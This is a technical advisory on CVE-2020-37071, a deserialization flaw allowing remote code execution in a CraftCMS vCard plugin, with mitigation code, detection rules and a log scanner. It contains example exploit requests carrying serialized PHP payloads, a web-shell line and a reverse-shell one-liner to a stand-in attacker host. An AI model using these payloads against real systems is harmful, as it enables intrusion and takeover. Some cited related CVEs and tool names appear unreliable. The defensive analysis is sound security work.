CVE-2020-37071
Weakness (CWE): CWE-502 Deserialization of Untrusted Data
CVSS Vector (v4.0): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
| Metric | Value |
|---|---|
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Attack Requirements (AT) | None |
| Privileges Required (PR) | None |
| User Interaction (UI) | None |
| Confidentiality (Vulnerable System) | High |
| Integrity (Vulnerable System) | High |
| Availability (Vulnerable System) | High |
| Confidentiality (Subsequent System) | None |
| Integrity (Subsequent System) | None |
| Availability (Subsequent System) | None |
Description
CraftCMS 3 vCard Plugin 1.0.0 contains a deserialization vulnerability that allows unauthenticated attackers to execute arbitrary PHP code through a crafted payload. Attackers can generate a malicious serialized payload that triggers remote code execution by exploiting the plugin's vCard download functionality with a specially crafted request.
Comprehensive Technical Analysis of CVE-2020-37071
CraftCMS vCard Plugin 1.0.0 – Unauthenticated PHP Deserialization Leading to Remote Code Execution (RCE)
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Type
- Insecure Deserialization (CWE-502) – The vulnerability arises from improper handling of user-supplied serialized data in the CraftCMS vCard plugin, allowing attackers to inject malicious PHP objects that execute arbitrary code upon deserialization.
CVSS v3.1 Scoring (9.8 – Critical)
| Metric | Score | Justification |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over HTTP/HTTPS. |
| Attack Complexity (AC) | Low (L) | No special conditions required; unauthenticated exploitation. |
| Privileges Required (PR) | None (N) | No authentication or elevated privileges needed. |
| User Interaction (UI) | None (N) | No user interaction required. |
| Scope (S) | Unchanged (U) | Impact is confined to the vulnerable application. |
| Confidentiality (C) | High (H) | Full system compromise possible (RCE). |
| Integrity (I) | High (H) | Arbitrary code execution allows data manipulation. |
| Availability (A) | High (H) | Attacker can disrupt or disable the system. |
Severity Justification
- Unauthenticated RCE – The vulnerability allows remote attackers to execute arbitrary PHP code without prior authentication, making it highly critical.
- Low Exploitation Complexity – Publicly available exploits (e.g., Exploit-DB #48492) demonstrate straightforward exploitation.
- High Impact – Successful exploitation grants full control over the affected system, enabling data exfiltration, lateral movement, and persistence.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Mechanism
The vulnerability stems from the vCard plugin’s insecure deserialization of user-controlled input in the download functionality. The attack flow is as follows:
1. Identify the vulnerable endpoint
   - The plugin exposes a route (e.g., `/actions/vcard/download`) that reads serialized data from the HTTP request (GET/POST parameters or cookies).
2. Craft a malicious payload
   - The attacker builds a serialized PHP object whose class has a magic method (`__wakeup()` or `__destruct()`) that leads to code execution. The class must be loadable by the target's autoloader at the moment `unserialize()` runs, so practical chains reuse classes that ship with the application or its dependencies.
   - Example payload structure (illustrative class name; the `O:` and `s:` length prefixes are byte counts and must be exact, otherwise `unserialize()` rejects the payload):
     `O:7:"Example":1:{s:4:"data";s:30:"<?php system($_GET['cmd']); ?>";}`
   - Tools such as PHPGGC (PHP Generic Gadget Chains) automate payload generation for gadget chains in common PHP libraries.
3. Trigger deserialization
   - The payload is sent to the vulnerable endpoint, which deserializes it without validation.
   - Example exploit request (URL-encoded on the wire; shown decoded here for readability):
     `GET /actions/vcard/download?data=O:7:"Example":1:{s:4:"data";s:30:"<?php system($_GET['cmd']); ?>";} HTTP/1.1`
     `Host: vulnerable-site.com`
4. Achieve RCE
   - During deserialization, or when the injected object is destroyed, the gadget's magic method runs attacker-controlled code (e.g., `system()`, `exec()`, `passthru()`).
   - The attacker can then:
     - execute shell commands (`id`, `whoami`, `cat /etc/passwd`);
     - establish a reverse shell (e.g., `bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'`);
     - deploy a web shell (e.g., `<?php system($_REQUEST['cmd']); ?>`).
Publicly Available Exploits
- Exploit-DB #48492 – Proof-of-concept (PoC) exploit demonstrating unauthenticated RCE.
- GitLab Exploit – A functional exploit script for automated attacks.
- VulnCheck Advisory – Detailed technical breakdown of the vulnerability.
3. Affected Systems & Software Versions
Vulnerable Software
- CraftCMS vCard Plugin v1.0.0 (the only version named in the CVE record; treat all installations as vulnerable until a patched release is confirmed).
- CraftCMS Core – The flaw is in the plugin, not in Craft itself, but any Craft 3.x site with the plugin installed is exposed.
Not Affected
- CraftCMS installations without the vCard plugin.
- Later versions of the plugin (if patched; no official patch information is available in the CVE).
Detection Methods
- Manual inspection:
  - Check whether the plugin is installed. Craft 3 installs plugins as Composer packages under `vendor/`, so look there and in the control panel's plugin list (older layouts use a `plugins/vcard/` directory).
  - Verify the plugin version via `composer show` or the CraftCMS admin panel.
- Automated scanning:
  - Nuclei: check the nuclei-templates repository for a template covering this CVE (the name `craftcms-vcard-rce.yaml` used here is illustrative; no template is referenced by the CVE record).
  - Burp Suite / OWASP ZAP: scan for the vulnerable endpoint (`/actions/vcard/download`) and probe whether serialized input changes the response or produces deserialization errors.
  - Metasploit: check for a module (a name such as `exploit/unix/webapp/craftcms_vcard_rce` is illustrative; none is referenced by the CVE record).
4. Recommended Mitigation Strategies
Immediate Actions
1. Disable the vCard plugin
   - Uninstall or disable the plugin via the CraftCMS admin panel (`/admin/plugins`), or remove its package with Composer.
   - Deleting the plugin directory by hand (`/plugins/vcard/` on older layouts) also works, but on Craft 3 it leaves Composer's autoloader pointing at missing files; prefer `composer remove`.
2. Apply virtual patching
   - Web Application Firewall (WAF) rules:
     - Block requests containing serialized PHP objects (e.g., `[OC]:[0-9]+:"`). The match must run on the URL-decoded value: a check on the raw query string misses `O%3A7%3A%22...` and double-encoded variants.
     - With ModSecurity, the OWASP Core Rule Set already carries this check as rule 933170 (PHP Injection Attack: Serialized Object Injection) in REQUEST-933-APPLICATION-ATTACK-PHP; make sure that rule file is enabled and not excluded for the Craft action routes.
   - Network-level protections:
     - Restrict access to `/actions/vcard/download` via IP allowlisting.
3. Upgrade or patch
   - If an official patch is released, apply it immediately.
   - Monitor CraftCMS security advisories and plugin updates.
Long-Term Remediation
1. Input validation and sanitization
   - Never deserialize untrusted data. Use JSON (or another data-only format) for anything that crosses a trust boundary.
   - If a serialized blob really must round-trip through the client, sign it server-side (HMAC) and verify the signature before decoding, so only server-produced blobs are ever deserialized.
2. Secure coding practices
   - Call `unserialize()` with `['allowed_classes' => false]` (PHP 7.0+), which turns every object in the blob into `__PHP_Incomplete_Class` and prevents any magic method from running. Allowlisting specific classes is weaker: any allowed class (or a class reachable through its properties) with `__wakeup()`, `__destruct()` or `__toString()` remains a gadget.
   - Disable dangerous PHP functions (`system`, `exec`, `passthru`, `shell_exec`) via `disable_functions` in `php.ini`. This is defence in depth only; gadget chains that write files or call `eval()` are not stopped by it.
3. Regular security audits
   - Conduct static (SAST) and dynamic (DAST) application security testing.
   - Use dependency scanning (e.g., OWASP Dependency-Check or `composer audit`) to detect vulnerable plugins.
4. Network segmentation
   - Isolate CraftCMS instances in a DMZ with strict access controls.
   - Apply least-privilege principles for database and filesystem access; the web server user should not be able to write to the web root.
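The remediation points above side by side, as an added example rather than code from the plugin: a gadget-style payload of the kind described in this advisory is fed to a handler hardened three ways (no object instantiation, JSON instead of PHP serialization, HMAC-signed blobs). The `ExportTask` class, the `entryId` field and the server key are assumptions for the demo.

```php
<?php
// Added example, not code from the vCard plugin or CraftCMS.
declare(strict_types=1);

// Hypothetical gadget class: a destructor that forwards attacker-chosen data
// into a callable. It is defined here only to prove it never runs.
class ExportTask
{
    public static $log = [];
    public $callback = 'trim';
    public $arg = '';
    public function __destruct() { self::$log[] = call_user_func($this->callback, $this->arg); }
}

// Object-injection payload an attacker would send in ?data=...
$payload = 'O:10:"ExportTask":2:{s:8:"callback";s:10:"strtoupper";s:3:"arg";s:2:"id";}';

// Fix 1: keep unserialize() but forbid class instantiation. Any object in the
// blob comes back as __PHP_Incomplete_Class, which carries no user code, so no
// __wakeup()/__destruct() can fire. Reject such blobs outright.
function decodeNoObjects(string $blob)
{
    $value = @unserialize($blob, ['allowed_classes' => false]);
    if ($value === false && $blob !== 'b:0;') {
        throw new InvalidArgumentException('malformed serialized data');
    }
    if (containsObject($value)) {
        throw new InvalidArgumentException('object payload rejected');
    }
    return $value;
}

function containsObject($value): bool
{
    if ($value instanceof __PHP_Incomplete_Class) { return true; }
    if (is_array($value)) {
        foreach ($value as $item) { if (containsObject($item)) { return true; } }
    }
    return false;
}

// Fix 2: do not use PHP serialization for request state at all. Accept JSON
// and bind it to the exact shape the feature needs (the field is assumed).
function decodeJsonRequest(string $json): array
{
    $value = json_decode($json, true, 8, JSON_THROW_ON_ERROR);
    if (!is_array($value) || !isset($value['entryId']) || !is_int($value['entryId'])) {
        throw new InvalidArgumentException('unexpected request shape');
    }
    return ['entryId' => $value['entryId']];
}

// Fix 3: if a serialized blob must round-trip through the client, sign it so
// only server-produced blobs are ever handed to unserialize().
function signBlob(string $blob, string $key): string
{
    return hash_hmac('sha256', $blob, $key) . '.' . base64_encode($blob);
}

function verifySignedBlob(string $token, string $key): string
{
    $parts = explode('.', $token, 2);
    $blob = isset($parts[1]) ? base64_decode($parts[1], true) : false;
    if ($blob === false || !hash_equals(hash_hmac('sha256', $blob, $key), $parts[0])) {
        throw new InvalidArgumentException('bad or missing signature');
    }
    return $blob;   // still decode it with allowed_classes set, as in decodeNoObjects()
}

// Check each fix against the attacker payload.
foreach (['decodeNoObjects', 'decodeJsonRequest'] as $fn) {
    try {
        $fn($payload);
        echo "$fn: accepted (BUG)\n";
    } catch (Throwable $e) {
        echo "$fn: rejected (", get_class($e), ": ", $e->getMessage(), ")\n";
    }
}
$key = 'assumed-server-secret';                 // assumption: stored server-side only
try {
    verifySignedBlob($payload, $key);           // attacker blob carries no valid MAC
} catch (InvalidArgumentException $e) {
    echo "verifySignedBlob: rejected (", $e->getMessage(), ")\n";
}
$token = signBlob(serialize(['entryId' => 42]), $key);
var_dump(decodeNoObjects(verifySignedBlob($token, $key)));   // array(1) { ["entryId"]=> int(42) }
var_dump(ExportTask::$log);                                  // array(0) {}: the gadget never ran
```

Fix 1 is the minimal change to an existing `unserialize()` call; fixes 2 and 3 remove the attack surface rather than filtering it. Combine fix 3 with fix 1, not instead of it: a signed blob is only as trustworthy as the key, and `allowed_classes => false` costs nothing once the blob carries plain data.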
5. Impact on the Cybersecurity Landscape
Exploitation Trends
- High Likelihood of Mass Exploitation – Given the CVSS 9.8 score and public PoCs, this vulnerability is attractive to:
- Opportunistic attackers (e.g., botnets, cryptominers).
- Advanced Persistent Threats (APTs) for initial access.
- Ransomware groups (e.g., LockBit, BlackCat) for lateral movement.
Broader Implications
1. Supply chain risks
   - The vCard plugin is a third-party dependency, highlighting risks in CMS ecosystems where plugins may introduce critical vulnerabilities.
   - Organizations must inventory and monitor all CMS plugins for vulnerabilities.
2. Insecure deserialization epidemic
   - Similar vulnerabilities (e.g., CVE-2017-5957 in WordPress, CVE-2019-18888 in Drupal) demonstrate that deserialization flaws remain a prevalent attack vector.
   - Developers must avoid PHP serialization where possible and enforce strict validation.
3. Regulatory and compliance risks
   - GDPR / CCPA: Unauthorized RCE could lead to data breaches, triggering reporting obligations.
   - PCI DSS: If CraftCMS processes payments, this vulnerability could violate Requirement 6 (Secure Development).
4. Threat intelligence and detection gaps
   - SIEM rules: Organizations should create detection rules for:
     - unusual PHP execution patterns (e.g., `system()`, `exec()` calls);
     - suspicious HTTP requests containing serialized payloads.
   - Endpoint Detection and Response (EDR): Monitor for unexpected child processes of the web server (e.g., `bash`, `sh`, `python`).
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability exists due to:
1. Lack of input validation
   - The vCard plugin deserializes user-supplied data without checking its structure or origin.
2. Dangerous PHP functions
   - The plugin likely calls `unserialize()` on untrusted input, enabling PHP object injection.
3. Magic method exploitation
   - Attackers leverage PHP's magic methods (`__wakeup()`, `__destruct()`) to execute arbitrary code during or after deserialization.
Exploit Chain Example
1. Gadget chain identification
   - Attackers identify a gadget chain (e.g., using PHPGGC) that leads to RCE. The gadget class must already exist in the target's codebase or dependencies; the class below is a deliberately minimal stand-in, not a class from the plugin.
   - Example chain:
     ```php
     class Example { public $data; function __destruct() { eval($this->data); } }
     ```
2. Payload construction
   - Serialize the malicious object. `eval()` takes PHP code without `<?php` tags, and the length prefixes are byte counts (`Example` is 7 bytes, `system('id');` is 13):
     `O:7:"Example":1:{s:4:"data";s:13:"system('id');";}`
3. Delivery and execution
   - Send the payload via a crafted HTTP request (URL-encoded on the wire; shown decoded):
     `GET /actions/vcard/download?data=O:7:"Example":1:{s:4:"data";s:13:"system('id');";} HTTP/1.1`
     `Host: target.com`
4. Result
   - When the deserialized object is destroyed, `__destruct()` evaluates the attacker's code; `system('id')` runs and its output is written into the HTTP response.
Forensic Indicators of Compromise (IOCs)
| Indicator | Description |
|---|---|
| HTTP Logs | Requests to /actions/vcard/download with serialized payloads. |
| Process Execution | Unexpected bash, sh, or php processes spawned by the web server (www-data, apache, nginx). |
| File System Changes | New files in /tmp/ or web root (e.g., shell.php, backdoor.php). |
| Network Connections | Outbound connections to attacker-controlled IPs (e.g., reverse shells). |
Detection & Hunting Queries
- Splunk / ELK query (the `_raw` regex only sees the payload if the log stores a decoded URL; otherwise also match the encoded form `O%3A[0-9]+%3A`):
  ```
  index=web_logs uri_path="/actions/vcard/download" | regex _raw="O:[0-9]+:\""
  ```
- YARA rule (note that `$php_code` only matches payloads that embed full PHP tags, such as web-shell drops; an `eval()`-style payload like `system('id');` matches `$serialized` alone):
  ```yara
  rule CraftCMS_vCard_RCE
  {
      strings:
          $serialized = /O:[0-9]+:"[^"]+":[0-9]+:\{.*\}/
          $php_code   = /<\?php\s+(system|exec|passthru|shell_exec)\(/
      condition:
          $serialized and $php_code
  }
  ```
- Sigma rule (the `'O:'` substring is broad; where the backend supports it, tighten with the `|re` modifier and `O:\d+:"`):
  ```yaml
  title: CraftCMS vCard Plugin RCE Attempt
  id: 12345678-1234-5678-1234-567812345678
  status: experimental
  description: Detects attempts to exploit CVE-2020-37071 via serialized payloads.
  references:
      - https://www.exploit-db.com/exploits/48492
  author: Your Name
  date: 2026/02/03
  logsource:
      category: webserver
      product: apache
      service: access
  detection:
      selection:
          cs-uri-stem: '/actions/vcard/download'
          cs-uri-query|contains:
              - 'O:'
              - 'O%3A'
      condition: selection
  falsepositives:
      - Legitimate plugin usage (unlikely)
  level: critical
  ```
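The hunting logic above, run offline over a few constructed access-log lines, as an added PHP example (not from the page's sources or from any vendor tool). The line format is Apache combined, the route is the one named in this advisory, and the IPs, timestamps, class names and user agents are made up. Unlike a raw `O:` substring match, it URL-decodes each query parameter (repeatedly, to catch double encoding) before looking for an object token, and it also catches the `C:` custom-serialization form.

```php
<?php
// Added example; constructed log lines, not real traffic.
declare(strict_types=1);

// PHP serialized object token (O: plain object, C: custom-serialized object),
// not glued to the end of an identifier such as "TODO:1:".
const OBJ_TOKEN = '/(?<![A-Za-z0-9_])([OC]):(\d+):"([A-Za-z0-9_\\\\]+)":\d+:\{/';

// Apache combined format: ip ident user [time] "METHOD target PROTO" status ...
const LOG_LINE = '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/';

function decodeRepeatedly(string $s, int $max = 3): string
{
    // Attackers double-encode to slip past a single decode; stop when stable.
    for ($i = 0; $i < $max; $i++) {
        $next = rawurldecode($s);
        if ($next === $s) { break; }
        $s = $next;
    }
    return $s;
}

function scanAccessLog(array $lines, string $route = '/actions/vcard/download'): array
{
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match(LOG_LINE, $line, $m)) { continue; }     // not combined format
        [, $ip, $method, $target, $status] = $m;
        $path  = parse_url($target, PHP_URL_PATH) ?: '';
        $query = parse_url($target, PHP_URL_QUERY) ?: '';
        if ($path !== $route) { continue; }
        foreach (explode('&', $query) as $pair) {
            if ($pair === '') { continue; }
            [$name, $raw] = array_pad(explode('=', $pair, 2), 2, '');
            if (preg_match(OBJ_TOKEN, decodeRepeatedly($raw), $t)) {
                $hits[] = [
                    'ip'     => $ip,
                    'method' => $method,
                    'path'   => $path,
                    'status' => (int) $status,
                    'param'  => rawurldecode($name),
                    'class'  => $t[3],     // class name the attacker tried to instantiate
                ];
            }
        }
    }
    return $hits;
}

// Constructed sample: a benign request, a single-encoded payload, a
// double-encoded payload, and an unrelated route with a look-alike string.
$lines = [
    '203.0.113.5 - - [03/Feb/2026:10:00:01 +0000] "GET /actions/vcard/download?id=42 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Feb/2026:10:00:02 +0000] "GET /actions/vcard/download?data=O%3A10%3A%22ExportTask%22%3A2%3A%7Bs%3A8%3A%22callback%22%3Bs%3A6%3A%22system%22%3Bs%3A3%3A%22arg%22%3Bs%3A2%3A%22id%22%3B%7D HTTP/1.1" 200 0 "-" "curl/7.88.1"',
    '198.51.100.7 - - [03/Feb/2026:10:00:03 +0000] "GET /actions/vcard/download?data=O%253A3%253A%2522Foo%2522%253A0%253A%257B%257D HTTP/1.1" 500 0 "-" "python-requests/2.31.0"',
    '192.0.2.9 - - [03/Feb/2026:10:00:04 +0000] "GET /index.php?q=TODO:1:%22x%22 HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
];

foreach (scanAccessLog($lines) as $hit) {
    printf("%-14s %s %s param=%s class=%s status=%d\n",
        $hit['ip'], $hit['method'], $hit['path'], $hit['param'], $hit['class'], $hit['status']);
}
// 198.51.100.7   GET /actions/vcard/download param=data class=ExportTask status=200
// 198.51.100.7   GET /actions/vcard/download param=data class=Foo status=500
```

Two limits worth keeping in mind when you run this against real logs: POST bodies and cookies are not in an access log, so a payload delivered that way needs application or WAF logging to be visible; and a hit with status 200 on the first line above is the one to triage first, since a 500 usually means the gadget class did not exist or the blob was rejected.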
Conclusion
CVE-2020-37071 represents a critical unauthenticated RCE vulnerability in the CraftCMS vCard plugin, posing severe risks to affected systems. Due to the low complexity of exploitation and public availability of PoCs, organizations must immediately disable the plugin and implement WAF rules to mitigate exposure.
Security teams should prioritize patching, monitor for exploitation attempts, and conduct forensic analysis if compromise is suspected. The broader implications highlight the need for secure coding practices, third-party risk management, and proactive threat hunting in CMS environments.
For further details, refer to: